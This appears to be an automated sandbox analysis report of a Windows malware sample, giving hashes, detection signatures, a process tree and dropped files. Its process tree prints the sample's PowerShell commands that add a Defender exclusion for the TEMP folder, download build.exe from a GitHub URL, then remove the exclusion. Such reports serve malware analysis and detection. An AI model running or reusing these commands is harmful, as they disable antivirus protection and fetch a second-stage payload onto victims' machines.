Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20250207-en
  • resource tags

    arch:x64arch:x86image:win7-20250207-enlocale:en-usos:windows7-x64system
  • submitted
    22/03/2025, 02:51

General

  • Target

    ZGZ3X_nig.exe

  • Size

    57KB

  • MD5

    16edd47bf01716b24958a0b3a3a7bcfb

  • SHA1

    8b7972f4190c2ca9d600084611e966fa0f899b98

  • SHA256

    568d485f89554f0a315d1f839e5e2b33c7735f9b3dc3892391bdaa16a3f480e8

  • SHA512

    9e6ca1cbfa194aff3aebb60fa7b73ee4ff63f9770cfe1d114b757d55693278ccb8f6a450235255a3ae03ac382b528b899eb973d571523fe12e3910b9568d38e1

  • SSDEEP

    768:d5qkvPJg++TldUQJbxc1knPItshRGibgFfYTrTQc1mRdJcWvFM79yipBvSrrCeao:3rPJVKjbcknWSOYvTfkWkFM79yQVFu/

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Hide Artifacts: Ignore Process Interrupts 1 TTPs 2 IoCs

    Command interpreters often include specific commands/flags that ignore errors and other hangups.

  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe
    "C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2184
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\6789.tmp\678A.tmp\678B.bat C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2784
      • C:\Windows\system32\net.exe
        net session
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2816
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 session
          4⤵
            PID:2804
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Hide Artifacts: Ignore Process Interrupts
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2928
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -NoProfile -ExecutionPolicy Bypass -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iwr -Uri \"https://github.com/nfdsafnsdl/login/releases/download/V1/build.exe\" -OutFile \"C:\Users\Admin\AppData\Local\Temp\build.exe\" -ErrorAction Stop"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2764
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -NoProfile -ExecutionPolicy Bypass -Command "Remove-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"
          3⤵
          • Hide Artifacts: Ignore Process Interrupts
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2672

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\6789.tmp\678A.tmp\678B.bat

      Filesize

      2KB

      MD5

      1c935ef28fdfd394b770d945d7f04d76

      SHA1

      29e251c3c40ce4ad1b2984bf26b444aa045d9b21

      SHA256

      aa58e1df5882878a44687853f47d10b655c3fe888ec20fb99446305f5d38c681

      SHA512

      a9e60f2ac4aec15a3ba0a95df224449f64777a027357792247dd597529542e79128aec996c89ff86a1654911b4b763c577d3c3d2f38c59b02b280b8ad824e7e1

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

      Filesize

      7KB

      MD5

      6753014d767e2b4a7aab6eb05a978b87

      SHA1

      913a5beb394a3d8944c32b417931a6a94d974cb5

      SHA256

      75162bf1827d9a8fa03f199d6a117f508837661bd1df2209c6b7339520ee9b28

      SHA512

      c8b5bf5151a9b2c5a7537d464e081964075c5f2360ecc2f47af3251949991104ffa2d1b0714bbae0d3139e8bd3835162bdde8d4aca04e53048ec920495595420

    • memory/2184-0-0x0000000140000000-0x0000000140028000-memory.dmp

      Filesize

      160KB

    • memory/2184-27-0x0000000140000000-0x0000000140028000-memory.dmp

      Filesize

      160KB

    • memory/2764-21-0x0000000001D10000-0x0000000001D18000-memory.dmp

      Filesize

      32KB

    • memory/2764-20-0x000000001B7B0000-0x000000001BA92000-memory.dmp

      Filesize

      2.9MB

    • memory/2928-11-0x000007FEF56D0000-0x000007FEF606D000-memory.dmp

      Filesize

      9.6MB

    • memory/2928-13-0x000007FEF56D0000-0x000007FEF606D000-memory.dmp

      Filesize

      9.6MB

    • memory/2928-12-0x000007FEF56D0000-0x000007FEF606D000-memory.dmp

      Filesize

      9.6MB

    • memory/2928-14-0x000007FEF56D0000-0x000007FEF606D000-memory.dmp

      Filesize

      9.6MB

    • memory/2928-10-0x000007FEF56D0000-0x000007FEF606D000-memory.dmp

      Filesize

      9.6MB

    • memory/2928-9-0x0000000002290000-0x0000000002298000-memory.dmp

      Filesize

      32KB

    • memory/2928-8-0x000000001B690000-0x000000001B972000-memory.dmp

      Filesize

      2.9MB

    • memory/2928-7-0x000007FEF598E000-0x000007FEF598F000-memory.dmp

      Filesize

      4KB